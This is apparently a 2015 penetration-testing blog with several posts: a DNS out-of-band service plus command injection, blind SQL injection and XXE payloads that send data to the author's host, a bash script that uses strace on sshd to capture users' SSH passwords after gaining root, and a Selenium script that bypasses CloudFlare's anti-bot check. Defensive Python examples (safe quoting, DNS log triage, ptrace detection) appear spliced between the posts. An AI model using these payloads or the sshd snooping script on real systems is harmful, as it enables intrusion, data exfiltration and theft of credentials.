Monday, December 7, 2015

Out of Band Injection Testing: Free public NS Query server

For blind injection testing, and as a follow-up to the previous post, I'm launching a pilot version of my DNS server (free for now).

Open up your terminal and connect to sudo.co.il on port 5353:

~# nc sudo.co.il 5353

..snip..
Your match string [a-z0-9]{5,} only [e.g. nicolas]: nicolas

Example query: nicolas-59.sudo.co.il
{"date": "06-Dec-2015", "query": "nicolas-59.sudo.co.il", "client": "74.125.44.140#47744:", "time": "17:27:44.409"}

In my last web application penetration test, I was able to read the source code of a PHP application, and there was a place that used the exec() function.
The problem was that I didn't get any output, and the regular "sleep 60" techniques did not seem to be working.

With my NS server I've successfully exfiltrated data over DNS queries.

PHP source:
exec('/opt/someprogram "$filename" "$tmppath"')

Successful injection:
/opt/someprogram blahblah.jpg /tmp/images$(host pwned.sudo.co.il)

Get WGET Version with this technique:
/opt/someprogram blahblah.jpg /tmp/image$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

With this output:
{"date": "xx-xxx-2015", "query": "GNU-Wget-1134--a-non-interactive-network-retriever.sudo.co.il", "client": "xx.xx.xx.xx#63325:", "time": "xx:xx:xx.xxx"}
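Why the double quotes in the exec() call above do not help, as an added example (not code from the tested application): inside double quotes the shell still performs $(...) command substitution. The payload here is a harmless echo marker and printf stands in for /opt/someprogram; both are assumptions made for this illustration. In PHP the equivalent of shlex.quote() is escapeshellarg().

```python
import shlex
import subprocess
import sys

# Constructed, harmless stand-in for the untrusted value: $(...) only echoes a marker.
UNTRUSTED_TMPPATH = "/tmp/images$(echo INJECTED)"

def run_shell(cmdline):
    """Run a command line through /bin/sh, as PHP's exec() does; return stdout."""
    done = subprocess.run(["/bin/sh", "-c", cmdline],
                          capture_output=True, text=True, check=True)
    return done.stdout

def double_quoted(value):
    # Same pattern as the page's exec() call: the value is wrapped in double
    # quotes, where the shell still expands $(...) before running the program.
    return run_shell('printf %s "' + value + '"')

def single_quoted(value):
    # shlex.quote() wraps the value in single quotes (escaping embedded ones),
    # so the shell passes it through as literal text.
    return run_shell("printf %s " + shlex.quote(value))

def no_shell(value):
    # Strongest form: pass an argument vector and never involve a shell.
    # A tiny Python child stands in for the real program (assumption).
    child = [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", value]
    return subprocess.run(child, capture_output=True, text=True, check=True).stdout

if __name__ == "__main__":
    print("double-quoted :", double_quoted(UNTRUSTED_TMPPATH))
    print("single-quoted :", single_quoted(UNTRUSTED_TMPPATH))
    print("no shell      :", no_shell(UNTRUSTED_TMPPATH))
```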

It may be useful with Command Injection, for example:
$(host $RANDOM-test.sudo.co.il)
| ping $RANDOM-test.sudo.co.il |
&& nslookup nslookup-test.sudo.co.il &&

Blind SQL Injection like this:
SELECT * FROM products WHERE id=1||UTL_HTTP.request('http://sqli-test.sudo.co.il/') --

External ENTITY Injection:
<!ENTITY dtd SYSTEM "http://xxe-test.sudo.co.il/file.dtd">%dtd

and more.
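From the defender's side, the same traffic is visible in resolver logs. The following is an added example (not part of the original post or of the service) that triages query logs, assumed to be normalized to the JSON shape shown above, for two signs of this technique: an unusually long leftmost label, and one client sending many distinct leftmost labels under the same parent name. The thresholds and sample lines are constructed for illustration.

```python
import json
from collections import defaultdict

# Constructed sample lines in the JSON shape shown above (all values made up).
SAMPLE_LOG = """\
{"date": "06-Dec-2015", "query": "www.example.com", "client": "192.0.2.10#40000:", "time": "17:27:40.100"}
{"date": "06-Dec-2015", "query": "nicolas-59.sudo.co.il", "client": "192.0.2.20#47744:", "time": "17:27:44.409"}
{"date": "06-Dec-2015", "query": "GNU-Wget-1134--a-non-interactive-network-retriever.sudo.co.il", "client": "192.0.2.20#63325:", "time": "17:28:01.000"}
{"date": "06-Dec-2015", "query": "12345-test.sudo.co.il", "client": "192.0.2.20#63326:", "time": "17:28:02.000"}
this line is not JSON and must be skipped
"""

def triage(log_text, max_label_len=30, max_unique_labels=2):
    """Return (long_label_hits, noisy_pairs).

    long_label_hits: (client_ip, qname) where the leftmost label is longer
                     than max_label_len (data packed into a hostname).
    noisy_pairs:     (client_ip, parent) where one client asked for more than
                     max_unique_labels distinct leftmost labels under a parent.
    Both thresholds are illustrative assumptions; tune them on real traffic.
    """
    long_hits = []
    seen = defaultdict(set)
    for line in log_text.splitlines():
        try:
            rec = json.loads(line)
            qname = rec["query"].rstrip(".").lower()
            client_ip = rec["client"].split("#")[0]  # drop "#port:" suffix
        except (ValueError, KeyError, TypeError, AttributeError):
            continue  # malformed or incomplete record
        label, _, parent = qname.partition(".")
        if not parent:
            continue  # single-label name, nothing to group on
        if len(label) > max_label_len:
            long_hits.append((client_ip, qname))
        seen[(client_ip, parent)].add(label)
    noisy = sorted(k for k, v in seen.items() if len(v) > max_unique_labels)
    return long_hits, noisy

if __name__ == "__main__":
    long_hits, noisy = triage(SAMPLE_LOG)
    print("long labels:", long_hits)
    print("many unique labels per parent:", noisy)
```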

For now, it's FREE but with limited support. (you may donate some $$$ if you love using it :)

Thursday, October 1, 2015

SSH Snooping in action

Got root via a local privilege escalation exploit? Want his password, but can't crack it?

You may try ssh snooping..

#!/bin/bash

while true; do
   ps_test=`ps ax|grep sshd|grep -v grep|grep priv|tr -s ' '`
   if [ -n "$ps_test" ]
   then
     f=$RANDOM
     a="output$RANDOM.log"
     strace -e trace=read -p $(echo $ps_test | awk '{print $1}') -o $f
     cat $f | grep 'read(6,' > $a
     rm $f
     chown root:root $a
     chmod 600 $a
   else
     echo -e ".\c"
     sleep 0.1
   fi
done
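Detecting this on a host you defend, as an added example (not part of the original post): strace attaches with ptrace, so the traced sshd process shows a non-zero TracerPid in /proc/<pid>/status. The function names and the watched process list are assumptions made for this illustration.

```python
import os

def parse_status(text):
    """Parse the 'Key:<tab>value' lines of a /proc/<pid>/status file into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def find_traced(proc_root="/proc", names=("sshd",)):
    """Return sorted [(pid, name, tracer_pid)] for watched processes under ptrace."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue  # skip non-process entries such as "self" or "meminfo"
        try:
            with open(os.path.join(proc_root, entry, "status")) as fh:
                status = parse_status(fh.read())
        except OSError:
            continue  # process exited between listdir() and open()
        try:
            tracer = int(status.get("TracerPid", "0"))
        except ValueError:
            continue  # unexpected field content
        if status.get("Name") in names and tracer != 0:
            hits.append((int(entry), status["Name"], tracer))
    return sorted(hits)

if __name__ == "__main__":
    for pid, name, tracer in find_traced():
        print("ALERT: %s pid %d is being traced by pid %d" % (name, pid, tracer))
```

An intruder who already has root can tamper with a local check like this, so run it from monitoring that ships results off-host. Setting kernel.yama.ptrace_scope to 3 disables ptrace attach entirely on kernels built with Yama.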




Monday, August 24, 2015

Get Remote Code Injection Feedback Online

Hi there, I've launched a specific service that may help you test Remote Command Injection ONLINE. (simple and dirty, without cool design :)

Why do we need it?

Let's say you're behind a NAT and you forgot the password to your router for configuring port forwarding? :)

If you're in a situation without a public IP and you can't listen for ICMP ping requests (for example) from the web server you're testing right now, try out this service.

http://rci.sudo.co.il

Hmm... I'm not responsible for any illegal use of this service.
If you've seen this IP or domain name in your logs, pay attention: somebody is testing your website for a Command Injection vulnerability.

Oh.. one more thing.. the service may disclose IPs with this vulnerability to the public.
Think twice before using it.

Thursday, August 6, 2015

URL encoding in Firefox :(

Just a little angry note...
I'm using Firefox in my web-app testing, and it fails to render DOM XSS, because of Firefox rendering document.location URL encoded. Switching to Chrome.

Good bye Firefox.

Monday, May 11, 2015

Simple CloudFlare bypass

I accidentally discovered a simple way to bypass CloudFlare anti-DDoS protection for future website scraping purposes.
As an example, we'll take http://skidpaste.org.


If you try to get the main page with the requests Python module:
>>> import requests
>>> r = requests.get('http://skidpaste.org')
>>> r.status_code
503
>>>

or with mechanize module:
>>> import mechanize
>>> br = mechanize.Browser()
>>> br.set_handle_robots(False)
>>> br.open('http://skidpaste.org')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/local/lib/python2.7/dist-packages/mechanize/_mechanize.py", line 203, in open
    return self._mech_open(url, data, timeout=timeout)
  File "/usr/local/lib/python2.7/dist-packages/mechanize/_mechanize.py", line 255, in _mech_open
    raise response
mechanize._response.httperror_seek_wrapper: HTTP Error 403: Forbidden
>>>
The response codes differ, but the main point is clear: you don't get the website content.

If we open the resource with the Firefox browser and wait for the actual website, we receive CloudFlare cookies, which are checked every time you access the resource.



So the idea is to get these cookies and pass them to my lovely requests module :)

The pseudocode looks like this:
1. Open website with selenium
2. Wait for 10 seconds
3. Get CloudFlare cookies
4. Close selenium browser.

Python example:

#!/usr/bin/python

from selenium import webdriver
from time import sleep
import cookielib
import requests

print 'Launching Firefox..'
browser = webdriver.Firefox()
print 'Entering to skidpaste.org...'
browser.get('http://skidpaste.org')
print 'Waiting 10 seconds...'
sleep(10)
a = browser.get_cookies()
print 'Got cloudflare cookies:\n'
# Print the cookie list itself, as shown in the output below
print a
print 'Closing Firefox..'
browser.close()

h = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0'}

b = cookielib.CookieJar()

for i in a:
  ck = cookielib.Cookie(name=i['name'], value=i['value'], domain=i['domain'], path=i['path'], secure=i['secure'], rest=False, version=0,port=None,port_specified=False,domain_specified=False,domain_initial_dot=False,path_specified=True,expires=i['expiry'],discard=True,comment=None,comment_url=None,rfc2109=False)
  b.set_cookie(ck)

r = requests.get('http://skidpaste.org', cookies=b, headers=h)
print len(r.content)
print r.status_code

The output:
# ./cloudflare_bypass.py 
Launching Firefox..
Entering to skidpaste.org...
Waiting 10 seconds...
Got cloudflare cookies:

[{u'domain': u'.skidpaste.org', u'name': u'__cfduid', u'value': u'd8af70c3b49361a5a1b818e91171e598d1431355518', u'expiry': 1462891518, u'path': u'/', u'secure': False}, {u'domain': u'.skidpaste.org', u'name': u'cf_clearance', u'value': u'5857af9797c612cde4ac590fe900e0e9f3d7098f-1431355526-57600', u'expiry': 1431416726, u'path': u'/', u'secure': False}, {u'domain': u'skidpaste.org', u'name': u'PHPSESSID', u'value': u'eefc5d29f6cea1ddb70ca5a0baaf60e1', u'expiry': None, u'path': u'/', u'secure': False}]
Closing Firefox..
115026
200